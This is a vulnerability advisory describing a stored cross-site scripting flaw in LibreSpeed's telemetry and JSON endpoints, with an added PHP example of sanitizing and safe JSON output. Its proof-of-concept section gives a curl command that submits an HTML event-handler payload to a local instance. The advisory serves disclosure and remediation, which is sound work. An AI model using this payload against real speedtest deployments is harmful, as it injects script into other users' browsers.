Summary
Missing neutralization of the ISP information in a speedtest result and an incorrect Content-Type HTTP header in the JSON API lead to a stored cross-site scripting vulnerability.
Details
The processedString field in the ispinfo parameter is missing neutralization. It is stored when a user submits a speedtest result to the telemetry API (results/telemetry.php) and returned by the JSON API (results/json.php). The JSON API also doesn't set the Content-Type: application/json HTTP header, so a browser that opens the endpoint directly may render the stored value as HTML.
This vulnerability was introduced in 3937b94.
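One way to close both gaps described above, shown here as an added example that is not LibreSpeed's own code: neutralize processedString before the telemetry endpoint stores it, and send the JSON response with an explicit Content-Type, X-Content-Type-Options: nosniff and hex-escaped markup characters. The function names, the $row layout and the decision to keep only processedString are assumptions made for illustration; the advisory only states which field and which header are involved.

```php
<?php
// Added example (not LibreSpeed's code). Function names and the shape of
// $row are assumptions; only the field and header names come from the advisory.

// Intake side: reduce the ispinfo parameter to plain text before it is stored,
// so no later consumer (JSON API or anything else) can receive markup from it.
function sanitize_ispinfo(string $raw): string
{
    $data = json_decode($raw, true);
    if (!is_array($data)) {
        return '{}';
    }
    $clean = [];
    if (isset($data['processedString']) && is_string($data['processedString'])) {
        $s = strip_tags($data['processedString']);
        // strip_tags leaves unbalanced brackets alone, so remove them explicitly.
        $s = str_replace(['<', '>'], '', $s);
        // Drop control and format characters; invalid UTF-8 yields null, hence the fallback.
        $s = preg_replace('/\p{C}+/u', '', $s) ?? '';
        $clean['processedString'] = mb_substr($s, 0, 255);
    }
    // Re-encode so the stored value contains exactly the fields we accepted.
    return json_encode($clean, JSON_UNESCAPED_UNICODE);
}

// Output side: declare the type, forbid sniffing, and escape <, >, &, ' and "
// as \uXXXX so that even a mis-typed response carries no literal markup.
function emit_json(array $row): void
{
    header('Content-Type: application/json; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo json_encode(
        $row,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE
    );
}

// Usage with a constructed submission: the tag is removed before storage.
$stored = sanitize_ispinfo('{"processedString":"foo - bar <b>x</b>"}');
// $stored is '{"processedString":"foo - bar x"}'
emit_json(['id' => 1, 'ispinfo' => $stored]);
```

The two halves are independent defenses: sanitizing on intake protects every reader of the stored row, while the headers and JSON_HEX_* flags protect the JSON endpoint even if an unsanitized value reaches the database by another path.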
PoC
- Start Librespeed with telemetry enabled:
docker run -it -p 80:80 -e TELEMETRY=true ghcr.io/librespeed/speedtest
- Send an arbitrarily crafted speedtest result:
curl "http://localhost/results/telemetry.php" --data 'ispinfo={"processedString":"foo - bar <body onpageshow=alert`XSS`>"}&dl=1&ul=1&ping=1&jitter=1&log=&extra='
- Open the JSON endpoint with the speedtest ID from above, e.g. http://localhost/results/json.php?id=1
Impact
This vulnerability affects LibreSpeed speedtest instances running version 5.2.5 or higher with telemetry enabled.